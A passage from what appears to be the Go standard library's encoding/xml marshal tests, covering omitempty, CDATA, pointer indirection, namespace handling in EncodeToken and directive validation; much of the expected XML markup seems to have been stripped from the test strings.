"Uint8"}, Value: "0"}, {Name: Name{Local: "Bool"}, Value: "false"}, {Name: Name{Local: "Str"}}, {Name: Name{Local: "Bytes"}}, }, Bytes: []byte{}, }, ExpectXML: ``, MarshalOnly: true, }, { Value: &OmitAttrTest{ Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), PStr: &empty, }, ExpectXML: ``, }, { Value: &OmitAttrTest{}, ExpectXML: ``, }, // pointer fields { Value: &PointerFieldsTest{Name: &nameAttr, Age: &ageAttr, Contents: &contentsAttr}, ExpectXML: `lorem ipsum`, MarshalOnly: true, }, // empty chardata pointer field { Value: &ChardataEmptyTest{}, ExpectXML: ``, MarshalOnly: true, }, // omitempty on fields { Value: &OmitFieldTest{ Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), PStr: &empty, Ptr: &PresenceTest{}, }, ExpectXML: `` + `8` + `9` + `23.5` + `255` + `true` + `str` + `byt` + `` + `` + ``, }, { Value: &OmitFieldTest{}, ExpectXML: ``, }, // Test ",any" { ExpectXML: `knownunknown`, Value: &AnyTest{ Nested: "known", AnyField: AnyHolder{ XMLName: Name{Local: "other"}, XML: "unknown", }, }, }, { Value: &AnyTest{Nested: "known", AnyField: AnyHolder{ XML: "", XMLName: Name{Local: "AnyField"}, }, }, ExpectXML: `known`, }, { ExpectXML: `b`, Value: &AnyOmitTest{ Nested: "b", }, }, { ExpectXML: `bei`, Value: &AnySliceTest{ Nested: "b", AnyField: []AnyHolder{ { XMLName: Name{Local: "c"}, XML: "e", }, { XMLName: Name{Space: "f", Local: "g"}, XML: "i", }, }, }, }, { ExpectXML: `b`, Value: &AnySliceTest{ Nested: "b", }, }, // Test recursive types. { Value: &RecurseA{ A: "a1", B: &RecurseB{ A: &RecurseA{"a2", nil}, B: "b1", }, }, ExpectXML: `a1a2b1`, }, // Test ignoring fields via "-" tag { ExpectXML: ``, Value: &IgnoreTest{}, }, { ExpectXML: ``, Value: &IgnoreTest{PublicSecret: "can't tell"}, MarshalOnly: true, }, { ExpectXML: `ignore me`, Value: &IgnoreTest{}, UnmarshalOnly: true, }, // Test escaping. { ExpectXML: `dquote: "; squote: '; ampersand: &; less: <; greater: >;`, Value: &AnyTest{ Nested: `dquote: "; squote: '; ampersand: &; less: <; greater: >;`, AnyField: AnyHolder{XMLName: Name{Local: "empty"}}, }, }, { ExpectXML: `newline: ; cr: ; tab: ;`, Value: &AnyTest{ Nested: "newline: \n; cr: \r; tab: \t;", AnyField: AnyHolder{XMLName: Name{Local: "AnyField"}}, }, }, { ExpectXML: "1\r2\r\n3\n\r4\n5", Value: &AnyTest{ Nested: "1\n2\n3\n\n4\n5", }, UnmarshalOnly: true, }, { ExpectXML: `42`, Value: &EmbedInt{ MyInt: 42, }, }, // Test outputting CDATA-wrapped text. { ExpectXML: ``, Value: &CDataTest{}, }, { ExpectXML: ``, Value: &CDataTest{ Chardata: "http://example.com/tests/1?foo=1&bar=baz", }, }, { ExpectXML: `!]]>`, Value: &CDataTest{ Chardata: "Literal !", }, }, { ExpectXML: ` Literal!]]>`, Value: &CDataTest{ Chardata: " Literal!", }, }, { ExpectXML: ` Literal! Literal!]]>`, Value: &CDataTest{ Chardata: " Literal! Literal!", }, }, { ExpectXML: `]]]]>]]>`, Value: &CDataTest{ Chardata: "]]>", }, }, // Test omitempty with parent chain; see golang.org/issue/4168. { ExpectXML: ``, Value: &Strings{}, }, // Custom marshalers. { ExpectXML: `hello world`, Value: &MyMarshalerTest{}, }, { ExpectXML: ``, Value: &MarshalerStruct{}, }, { ExpectXML: ``, Value: &OuterStruct{IntAttr: 10}, }, { ExpectXML: ``, Value: &OuterNamedStruct{XMLName: Name{Space: "outerns", Local: "test"}, IntAttr: 10}, }, { ExpectXML: ``, Value: &OuterNamedOrderedStruct{XMLName: Name{Space: "outerns", Local: "test"}, IntAttr: 10}, }, { ExpectXML: ``, Value: &OuterOuterStruct{OuterStruct{IntAttr: 10}}, }, { ExpectXML: `test`, Value: &NestedAndChardata{AB: make([]string, 2), Chardata: "test"}, }, { ExpectXML: ``, Value: &NestedAndComment{AB: make([]string, 2), Comment: "test"}, }, { ExpectXML: ``, Value: &NestedAndCData{AB: make([]string, 2), CDATA: "test"}, }, // Test pointer indirection in various kinds of fields. // https://golang.org/issue/19063 { ExpectXML: ``, Value: &IndirComment{Comment: stringptr("hi")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirComment{Comment: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirComment{Comment: nil}, MarshalError: "xml: bad type for comment field of xml.IndirComment", }, { ExpectXML: ``, Value: &IndirComment{Comment: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceComment{Comment: "hi"}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceComment{Comment: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceComment{Comment: nil}, MarshalError: "xml: bad type for comment field of xml.IfaceComment", }, { ExpectXML: ``, Value: &IfaceComment{Comment: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectComment{Comment: string("hi")}, }, { ExpectXML: ``, Value: &DirectComment{Comment: string("")}, }, { ExpectXML: `hi`, Value: &IndirChardata{Chardata: stringptr("hi")}, }, { ExpectXML: ``, Value: &IndirChardata{Chardata: stringptr("hi")}, UnmarshalOnly: true, // marshals without CDATA }, { ExpectXML: ``, Value: &IndirChardata{Chardata: stringptr("")}, }, { ExpectXML: ``, Value: &IndirChardata{Chardata: nil}, MarshalOnly: true, // unmarshal leaves Chardata=stringptr("") }, { ExpectXML: `hi`, Value: &IfaceChardata{Chardata: string("hi")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceChardata{Chardata: string("hi")}, UnmarshalOnly: true, // marshals without CDATA UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceChardata{Chardata: string("")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceChardata{Chardata: nil}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: `hi`, Value: &DirectChardata{Chardata: string("hi")}, }, { ExpectXML: ``, Value: &DirectChardata{Chardata: string("hi")}, UnmarshalOnly: true, // marshals without CDATA }, { ExpectXML: ``, Value: &DirectChardata{Chardata: string("")}, }, { ExpectXML: ``, Value: &IndirCDATA{CDATA: stringptr("hi")}, }, { ExpectXML: `hi`, Value: &IndirCDATA{CDATA: stringptr("hi")}, UnmarshalOnly: true, // marshals with CDATA }, { ExpectXML: ``, Value: &IndirCDATA{CDATA: stringptr("")}, }, { ExpectXML: ``, Value: &IndirCDATA{CDATA: nil}, MarshalOnly: true, // unmarshal leaves CDATA=stringptr("") }, { ExpectXML: ``, Value: &IfaceCDATA{CDATA: string("hi")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: `hi`, Value: &IfaceCDATA{CDATA: string("hi")}, UnmarshalOnly: true, // marshals with CDATA UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceCDATA{CDATA: string("")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceCDATA{CDATA: nil}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &DirectCDATA{CDATA: string("hi")}, }, { ExpectXML: `hi`, Value: &DirectCDATA{CDATA: string("hi")}, UnmarshalOnly: true, // marshals with CDATA }, { ExpectXML: ``, Value: &DirectCDATA{CDATA: string("")}, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: nil}, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: ""}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: nil}, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &IndirElement{Element: stringptr("hi")}, }, { ExpectXML: ``, Value: &IndirElement{Element: stringptr("")}, }, { ExpectXML: ``, Value: &IndirElement{Element: nil}, }, { ExpectXML: `hi`, Value: &IfaceElement{Element: "hi"}, MarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceElement{Element: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceElement{Element: nil}, }, { ExpectXML: ``, Value: &IfaceElement{Element: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectElement{Element: string("hi")}, }, { ExpectXML: ``, Value: &DirectElement{Element: string("")}, }, { ExpectXML: `hi`, Value: &IndirOmitEmpty{OmitEmpty: stringptr("hi")}, }, { // Note: Changed in Go 1.8 to include element (because x.OmitEmpty != nil). ExpectXML: ``, Value: &IndirOmitEmpty{OmitEmpty: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirOmitEmpty{OmitEmpty: stringptr("")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IndirOmitEmpty{OmitEmpty: nil}, }, { ExpectXML: `hi`, Value: &IfaceOmitEmpty{OmitEmpty: "hi"}, MarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceOmitEmpty{OmitEmpty: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceOmitEmpty{OmitEmpty: nil}, }, { ExpectXML: ``, Value: &IfaceOmitEmpty{OmitEmpty: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectOmitEmpty{OmitEmpty: string("hi")}, }, { ExpectXML: ``, Value: &DirectOmitEmpty{OmitEmpty: string("")}, }, { ExpectXML: `hi`, Value: &IndirAny{Any: stringptr("hi")}, }, { ExpectXML: ``, Value: &IndirAny{Any: stringptr("")}, }, { ExpectXML: ``, Value: &IndirAny{Any: nil}, }, { ExpectXML: `hi`, Value: &IfaceAny{Any: "hi"}, MarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectAny{Any: string("hi")}, }, { ExpectXML: ``, Value: &DirectAny{Any: string("")}, }, { ExpectXML: `hi`, Value: &IndirAny{Any: stringptr("hi")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IndirAny{Any: stringptr("")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IndirAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectAny{Any: string("hi")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectAny{Any: string("")}, UnmarshalOnly: true, }, } func TestMarshal(t *testing.T) { for idx, test := range marshalTests { if test.UnmarshalOnly { continue } t.Run(fmt.Sprintf("%d", idx), func(t *testing.T) { data, err := Marshal(test.Value) if err != nil { if test.MarshalError == "" { t.Errorf("marshal(%#v): %s", test.Value, err) return } if !strings.Contains(err.Error(), test.MarshalError) { t.Errorf("marshal(%#v): %s, want %q", test.Value, err, test.MarshalError) } return } if test.MarshalError != "" { t.Errorf("Marshal succeeded, want error %q", test.MarshalError) return } if got, want := string(data), test.ExpectXML; got != want { if strings.Contains(want, "\n") { t.Errorf("marshal(%#v):\nHAVE:\n%s\nWANT:\n%s", test.Value, got, want) } else { t.Errorf("marshal(%#v):\nhave %#q\nwant %#q", test.Value, got, want) } } }) } } type AttrParent struct { X string `xml:"X>Y,attr"` } type BadAttr struct { Name map[string]string `xml:"name,attr"` } var marshalErrorTests = []struct { Value any Err string Kind reflect.Kind }{ { Value: make(chan bool), Err: "xml: unsupported type: chan bool", Kind: reflect.Chan, }, { Value: map[string]string{ "question": "What do you get when you multiply six by nine?", "answer": "42", }, Err: "xml: unsupported type: map[string]string", Kind: reflect.Map, }, { Value: map[*Ship]bool{nil: false}, Err: "xml: unsupported type: map[*xml.Ship]bool", Kind: reflect.Map, }, { Value: &Domain{Comment: []byte("f--bar")}, Err: `xml: comments must not contain "--"`, }, // Reject parent chain with attr, never worked; see golang.org/issue/5033. { Value: &AttrParent{}, Err: `xml: X>Y chain not valid with attr flag`, }, { Value: BadAttr{map[string]string{"X": "Y"}}, Err: `xml: unsupported type: map[string]string`, }, } var marshalIndentTests = []struct { Value any Prefix string Indent string ExpectXML string }{ { Value: &SecretAgent{ Handle: "007", Identity: "James Bond", Obfuscate: "", }, Prefix: "", Indent: "\t", ExpectXML: "\n\tJames Bond\n", }, } func TestMarshalErrors(t *testing.T) { for idx, test := range marshalErrorTests { data, err := Marshal(test.Value) if err == nil { t.Errorf("#%d: marshal(%#v) = [success] %q, want error %v", idx, test.Value, data, test.Err) continue } if err.Error() != test.Err { t.Errorf("#%d: marshal(%#v) = [error] %v, want %v", idx, test.Value, err, test.Err) } if test.Kind != reflect.Invalid { if kind := err.(*UnsupportedTypeError).Type.Kind(); kind != test.Kind { t.Errorf("#%d: marshal(%#v) = [error kind] %s, want %s", idx, test.Value, kind, test.Kind) } } } } // Do invertibility testing on the various structures that we test func TestUnmarshal(t *testing.T) { for i, test := range marshalTests { if test.MarshalOnly { continue } if _, ok := test.Value.(*Plain); ok { continue } if test.ExpectXML == ``+ `b`+ `b1`+ `` { // TODO(rogpeppe): re-enable this test in // https://go-review.googlesource.com/#/c/5910/ continue } vt := reflect.TypeOf(test.Value) dest := reflect.New(vt.Elem()).Interface() err := Unmarshal([]byte(test.ExpectXML), dest) t.Run(fmt.Sprintf("%d", i), func(t *testing.T) { switch fix := dest.(type) { case *Feed: fix.Author.InnerXML = "" for i := range fix.Entry { fix.Entry[i].Author.InnerXML = "" } } if err != nil { if test.UnmarshalError == "" { t.Errorf("unmarshal(%#v): %s", test.ExpectXML, err) return } if !strings.Contains(err.Error(), test.UnmarshalError) { t.Errorf("unmarshal(%#v): %s, want %q", test.ExpectXML, err, test.UnmarshalError) } return } if got, want := dest, test.Value; !reflect.DeepEqual(got, want) { t.Errorf("unmarshal(%q):\nhave %#v\nwant %#v", test.ExpectXML, got, want) } }) } } func TestMarshalIndent(t *testing.T) { for i, test := range marshalIndentTests { data, err := MarshalIndent(test.Value, test.Prefix, test.Indent) if err != nil { t.Errorf("#%d: Error: %s", i, err) continue } if got, want := string(data), test.ExpectXML; got != want { t.Errorf("#%d: MarshalIndent:\nGot:%s\nWant:\n%s", i, got, want) } } } type limitedBytesWriter struct { w io.Writer remain int // until writes fail } func (lw *limitedBytesWriter) Write(p []byte) (n int, err error) { if lw.remain <= 0 { println("error") return 0, errors.New("write limit hit") } if len(p) > lw.remain { p = p[:lw.remain] n, _ = lw.w.Write(p) lw.remain = 0 return n, errors.New("write limit hit") } n, err = lw.w.Write(p) lw.remain -= n return n, err } func TestMarshalWriteErrors(t *testing.T) { var buf bytes.Buffer const writeCap = 1024 w := &limitedBytesWriter{&buf, writeCap} enc := NewEncoder(w) var err error var i int const n = 4000 for i = 1; i <= n; i++ { err = enc.Encode(&Passenger{ Name: []string{"Alice", "Bob"}, Weight: 5, }) if err != nil { break } } if err == nil { t.Error("expected an error") } if i == n { t.Errorf("expected to fail before the end") } if buf.Len() != writeCap { t.Errorf("buf.Len() = %d; want %d", buf.Len(), writeCap) } } func TestMarshalWriteIOErrors(t *testing.T) { enc := NewEncoder(errWriter{}) expectErr := "unwritable" err := enc.Encode(&Passenger{}) if err == nil || err.Error() != expectErr { t.Errorf("EscapeTest = [error] %v, want %v", err, expectErr) } } func TestMarshalFlush(t *testing.T) { var buf strings.Builder enc := NewEncoder(&buf) if err := enc.EncodeToken(CharData{data: []byte("hello world")}); err != nil { t.Fatalf("enc.EncodeToken: %v", err) } if buf.Len() > 0 { t.Fatalf("enc.EncodeToken caused actual write: %q", buf.String()) } if err := enc.Flush(); err != nil { t.Fatalf("enc.Flush: %v", err) } if buf.String() != "hello world" { t.Fatalf("after enc.Flush, buf.String() = %q, want %q", buf.String(), "hello world") } } func BenchmarkMarshal(b *testing.B) { b.ReportAllocs() b.RunParallel(func(pb *testing.PB) { for pb.Next() { Marshal(atomValue) } }) } func BenchmarkUnmarshal(b *testing.B) { b.ReportAllocs() xml := []byte(atomXML) b.RunParallel(func(pb *testing.PB) { for pb.Next() { Unmarshal(xml, &Feed{}) } }) } // golang.org/issue/6556 func TestStructPointerMarshal(t *testing.T) { type A struct { XMLName string `xml:"a"` B []any } type C struct { XMLName Name Value string `xml:"value"` } a := new(A) a.B = append(a.B, &C{ XMLName: Name{Local: "c"}, Value: "x", }) b, err := Marshal(a) if err != nil { t.Fatal(err) } if x := string(b); x != "x" { t.Fatal(x) } var v A err = Unmarshal(b, &v) if err != nil { t.Fatal(err) } } var encodeTokenTests = []struct { desc string toks []Token want string err string }{{ desc: "start element with name space", toks: []Token{ StartElement{Name{"space", "local"}, nil, false, ""}, }, want: ``, }, { desc: "start element with no name", toks: []Token{ StartElement{Name{"space", ""}, nil, false, ""}, }, err: "xml: start tag with no name", }, { desc: "end element with no name", toks: []Token{ EndElement{Name{"space", ""}, false}, }, err: "xml: end tag with no name", }, { desc: "empty element", toks: []Token{ StartElement{Name{"", "foo"}, nil, true, ""}, EndElement{Name{"", "foo"}, true}, }, want: ``, }, { desc: "empty element with extra space", toks: []Token{ StartElement{Name{"", "foo"}, nil, true, " "}, EndElement{Name{"", "foo"}, true}, }, want: ``, }, { desc: "char data", toks: []Token{ CharData{data: []byte("foo")}, }, want: `foo`, }, { desc: "char data with tab and newline characters", toks: []Token{ CharData{data: []byte(" \t\n")}, }, want: " \t\n", }, { desc: "comment", toks: []Token{ Comment("foo"), }, want: ``, }, { desc: "comment with invalid content", toks: []Token{ Comment("foo-->"), }, err: "xml: EncodeToken of Comment containing --> marker", }, { desc: "proc instruction", toks: []Token{ ProcInst{"Target", []byte("Instruction")}, }, want: ``, }, { desc: "proc instruction with empty target", toks: []Token{ ProcInst{"", []byte("Instruction")}, }, err: "xml: EncodeToken of ProcInst with invalid Target", }, { desc: "proc instruction with bad content", toks: []Token{ ProcInst{"", []byte("Instruction?>")}, }, err: "xml: EncodeToken of ProcInst with invalid Target", }, { desc: "directive", toks: []Token{ Directive("foo"), }, want: ``, }, { desc: "more complex directive", toks: []Token{ Directive("DOCTYPE doc [ '> ]"), }, want: `'> ]>`, }, { desc: "directive instruction with bad name", toks: []Token{ Directive("foo>"), }, err: "xml: EncodeToken of Directive containing wrong < or > markers", }, { desc: "end tag without start tag", toks: []Token{ EndElement{Name{"foo", "bar"}, false}, }, err: "xml: end tag without start tag", }, { desc: "mismatching end tag local name", toks: []Token{ StartElement{Name{"", "foo"}, nil, false, ""}, EndElement{Name{"", "bar"}, false}, }, err: "xml: end tag does not match start tag ", want: ``, }, { desc: "mismatching end tag namespace", toks: []Token{ StartElement{Name{"space", "foo"}, nil, false, ""}, EndElement{Name{"another", "foo"}, false}, }, err: "xml: end tag in namespace another does not match start tag in namespace space", want: ``, }, { desc: "start element with explicit namespace", toks: []Token{ StartElement{Name{"space", "local"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, {Name{"space", "foo"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "start element with explicit namespace and colliding prefix", toks: []Token{ StartElement{Name{"space", "local"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, {Name{"space", "foo"}, "value", ""}, {Name{"x", "bar"}, "other", ""}, }, false, ""}, }, want: ``, }, { desc: "start element using previously defined namespace", toks: []Token{ StartElement{Name{"", "local"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"space", "x"}, "y", ""}, }, false, ""}, }, want: ``, }, { desc: "nested name space with same prefix", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space1", ""}, }, false, ""}, StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space2", ""}, }, false, ""}, StartElement{Name{"", "foo"}, []Attr{ {Name{"space1", "a"}, "space1 value", ""}, {Name{"space2", "b"}, "space2 value", ""}, }, false, ""}, EndElement{Name{"", "foo"}, false}, EndElement{Name{"", "foo"}, false}, StartElement{Name{"", "foo"}, []Attr{ {Name{"space1", "a"}, "space1 value", ""}, {Name{"space2", "b"}, "space2 value", ""}, }, false, ""}, }, want: ``, }, { desc: "start element defining several prefixes for the same name space", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"xmlns", "a"}, "space", ""}, {Name{"xmlns", "b"}, "space", ""}, {Name{"space", "x"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element redefines name space", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"xmlns", "y"}, "space", ""}, {Name{"space", "a"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element creates alias for default name space", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"xmlns", "y"}, "space", ""}, {Name{"space", "a"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element defines default name space with existing prefix", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, {Name{"space", "a"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element uses empty attribute name space when default ns defined", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "attr"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "redefine xmlns", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"foo", "xmlns"}, "space", ""}, }, false, ""}, }, want: ``, }, { desc: "xmlns with explicit name space #1", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"xml", "xmlns"}, "space", ""}, }, false, ""}, }, want: ``, }, { desc: "xmlns with explicit name space #2", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{xmlURL, "xmlns"}, "space", ""}, }, false, ""}, }, want: ``, }, { desc: "empty name space declaration is ignored", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "foo"}, "", ""}, }, false, ""}, }, want: ``, }, { desc: "attribute with no name is ignored", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"", ""}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "namespace URL with non-valid name", toks: []Token{ StartElement{Name{"/34", "foo"}, []Attr{ {Name{"/34", "x"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element resets default namespace to empty", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"", "foo"}, []Attr{ {Name{"", "xmlns"}, "", ""}, {Name{"", "x"}, "value", ""}, {Name{"space", "x"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element requires empty default name space", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"", "foo"}, nil, false, ""}, }, want: ``, }, { desc: "attribute uses name space from xmlns", toks: []Token{ StartElement{Name{"some/space", "foo"}, []Attr{ {Name{"", "attr"}, "value", ""}, {Name{"some/space", "other"}, "other value", ""}, }, false, ""}, }, want: ``, }, { desc: "default name space should not be used by attributes", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, {Name{"xmlns", "bar"}, "space", ""}, {Name{"space", "baz"}, "foo", ""}, }, false, ""}, StartElement{Name{"space", "baz"}, nil, false, ""}, EndElement{Name{"space", "baz"}, false}, EndElement{Name{"space", "foo"}, false}, }, want: ``, }, { desc: "default name space not used by attributes, not explicitly defined", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, {Name{"space", "baz"}, "foo", ""}, }, false, ""}, StartElement{Name{"space", "baz"}, nil, false, ""}, EndElement{Name{"space", "baz"}, false}, EndElement{Name{"space", "foo"}, false}, }, want: ``, }, { desc: "impossible xmlns declaration", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "bar"}, []Attr{ {Name{"space", "attr"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "reserved namespace prefix -- all lower case", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"http://www.w3.org/2001/xmlSchema-instance", "nil"}, "true", ""}, }, false, ""}, }, want: ``, }, { desc: "reserved namespace prefix -- all upper case", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"http://www.w3.org/2001/XMLSchema-instance", "nil"}, "true", ""}, }, false, ""}, }, want: ``, }, { desc: "reserved namespace prefix -- all mixed case", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"http://www.w3.org/2001/XmLSchema-instance", "nil"}, "true", ""}, }, false, ""}, }, want: ``, }, { desc: "start element with attributes separated by newline", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"", "abc"}, "123", ""}, {Name{"", "xyz"}, "456", "\n"}, }, false, ""}, }, want: ``, }} func TestEncodeToken(t *testing.T) { loop: for i, tt := range encodeTokenTests { var buf strings.Builder enc := NewEncoder(&buf) var err error for j, tok := range tt.toks { err = enc.EncodeToken(tok) if err != nil && j < len(tt.toks)-1 { t.Errorf("#%d %s token #%d: %v", i, tt.desc, j, err) continue loop } } errorf := func(f string, a ...any) { t.Errorf("#%d %s token #%d:%s", i, tt.desc, len(tt.toks)-1, fmt.Sprintf(f, a...)) } switch { case tt.err != "" && err == nil: errorf(" expected error; got none") continue case tt.err == "" && err != nil: errorf(" got error: %v", err) continue case tt.err != "" && err != nil && tt.err != err.Error(): errorf(" error mismatch; got %v, want %v", err, tt.err) continue } if err := enc.Flush(); err != nil { errorf(" %v", err) continue } if got := buf.String(); got != tt.want { errorf("\ngot %v\nwant %v", got, tt.want) continue } } } func TestProcInstEncodeToken(t *testing.T) { var buf bytes.Buffer enc := NewEncoder(&buf) if err := enc.EncodeToken(ProcInst{"xml", []byte("Instruction")}); err != nil { t.Fatalf("enc.EncodeToken: expected to be able to encode xml target ProcInst as first token, %s", err) } if err := enc.EncodeToken(ProcInst{"Target", []byte("Instruction")}); err != nil { t.Fatalf("enc.EncodeToken: expected to be able to add non-xml target ProcInst") } if err := enc.EncodeToken(ProcInst{"xml", []byte("Instruction")}); err == nil { t.Fatalf("enc.EncodeToken: expected to not be allowed to encode xml target ProcInst when not first token") } } func TestDecodeEncode(t *testing.T) { var in, out bytes.Buffer in.WriteString(` `) dec := NewDecoder(&in) enc := NewEncoder(&out) for tok, err := dec.Token(); err == nil; tok, err = dec.Token() { err = enc.EncodeToken(tok) if err != nil { t.Fatalf("enc.EncodeToken: Unable to encode token (%#v), %v", tok, err) } } } // Issue 9796. Used to fail with GORACE="halt_on_error=1" -race. func TestRace9796(t *testing.T) { type A struct{} type B struct { C []A `xml:"X>Y"` } var wg sync.WaitGroup for i := 0; i < 2; i++ { wg.Add(1) go func() { Marshal(B{[]A{{}}}) wg.Done() }() } wg.Wait() } func TestIsValidDirective(t *testing.T) { testOK := []string{ "<>", "< < > >", "' '>' >", " ]>", " '<' ' doc ANY> ]>", ">>> a < comment --> [ ] >", } testKO := []string{ "<", ">", "", "< > > < < >", " -->", "", "'", "", } for _, s := range testOK { if !isValidDirective(Directive(s)) { t.Errorf("Directive %q is expected to be valid", s) } } for _, s := range testKO { if isValidDirective(Directive(s)) { t.Errorf("Directive %q is expected to be invalid", s) } } } // Issue 11719. EncodeToken used to silently eat tokens with an invalid type. func TestSimpleUseOfEncodeToken(t *testing.T) { var buf strings.Builder enc := NewEncoder(&buf) if err := enc.EncodeToken(&StartElement{Name: Name{"", "object1"}}); err == nil { t.Errorf("enc.EncodeToken: pointer type should be rejected") } if err := enc.EncodeToken(&EndElement{Name: Name{"", "object1"}}); err == nil { t.Errorf("enc.EncodeToken: pointer type should be rejected") } if err := enc.EncodeToken(StartElement{Name: Name{"", "object2"}}); err != nil { t.Errorf("enc.EncodeToken: StartElement %s", err) } if err := enc.EncodeToken(EndElement{Name: Name{"", "object2"}}); err != nil { t.Errorf("enc.EncodeToken: EndElement %s", err) } if err := enc.EncodeToken(Universe{}); err == nil { t.Errorf("enc.EncodeToken: invalid type not caught") } if err := enc.Flush(); 